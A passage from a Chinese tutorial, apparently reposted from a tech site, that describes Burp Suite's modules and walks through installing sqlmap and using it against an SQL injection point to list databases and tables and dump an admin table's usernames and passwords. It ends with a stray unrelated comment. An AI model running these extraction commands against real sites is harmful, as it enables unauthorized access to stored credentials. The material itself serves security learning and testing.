这一排都是工具箱:

Proxy——是一个拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。
Spider——是一个应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能。 Scanner[仅限版]——是一个高级的工具,执行后,它能自动地发现web 应用程序的安全漏洞。
Intruder——是一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。
Repeater——是一个靠手动操作来补发单独的HTTP 请求,并分析应用程序响应的工具。 Sequencer——是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。
Decoder——是一个进行手动执行或对应用程序数据者智能解码编码的工具。
Comparer——是一个实用的工具,通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。
具体功能不一一实践,burpsuite入门难,参数多,但运用得当,可以在日常工作中如虎添翼。
9.SQLmap
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。
测试环境:Ubuntu16.04
安装:
官网下载tar.gz文件到本地
解压 sudo tar zxvf 文件名
进入解压目录:./sqlmap.py
检测注入阶段 基本格式
sqlmap -u “ ?nid=63″ (?nid=63为注入点)
默认使用level1检测全部类型
注入成功后 获取基本信息
sqlmap -u “?nid=63” –dbms mysql –level 3 –dbs
查询有哪些
sqlmap -u “?nid=63” –dbms mysql –level 3 -D test –tables
查询test中有哪些表
sqlmap -u “?nid=63” –dbms mysql –level 3 -D test -T admin –columns
查询test中admin表有哪些字段
sqlmap -u “?nid=63” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump
dump出字段username与password中的数据
从中搜索字段
sqlmap -r “?nid=63” –dbms mysql -D dedecms –search -C admin,password
在dedecms中搜索字段admin或者password。
实际操作
注入点为?nid=63
1.使用./sqlmap.py -u “ ?nid=63″ 得到版本及其他应用软件版本
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/tongxinshuyu/article-74119-4.html
小王子~
在不经我大中国同意的情况下派军舰前来